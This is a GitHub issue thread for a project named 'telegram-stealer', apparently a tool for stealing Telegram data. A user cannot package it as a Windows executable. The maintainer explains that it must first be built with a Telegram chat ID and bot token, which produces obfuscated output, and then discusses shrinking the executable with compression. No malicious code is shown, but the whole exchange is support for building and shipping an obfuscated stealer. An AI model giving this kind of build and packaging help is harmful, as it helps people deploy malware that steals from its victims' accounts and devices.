### ISSUE TITLE
npm run pkg-windows

### ISSUE THREAD

**Issue by keeprockin2019** [rigwild/telegram-stealer#3]
```
> npm run pkg-windows

> pkg-windows
> pkg --targets node18-win-x64 --compress GZip --output hello.exe obfuscated/runner.js

> pkg@5.8.0
compression:  GZip
> Error! Input file does not exist
  /Users/c0ny00/Desktop/77/telegram-stealer/obfuscated/runner.js
```
what happened, can't compile？
macos && webstorm

**Comment by rigwild** [comment]
You first need to build it... Follow the README. It willd create the `obfuscated` directory.

```sh
npm run build <chat_id> <bot_token>
```

**Comment by keeprockin2019** [comment]
thank you, it works, is there a way to optimize the package size?

**Comment by rigwild** [comment]
I've tried to compress using [UPX](https://upx.github.io/) but it seems that [pkg does dot support it yet](https://github.com/vercel/pkg/issues/50).
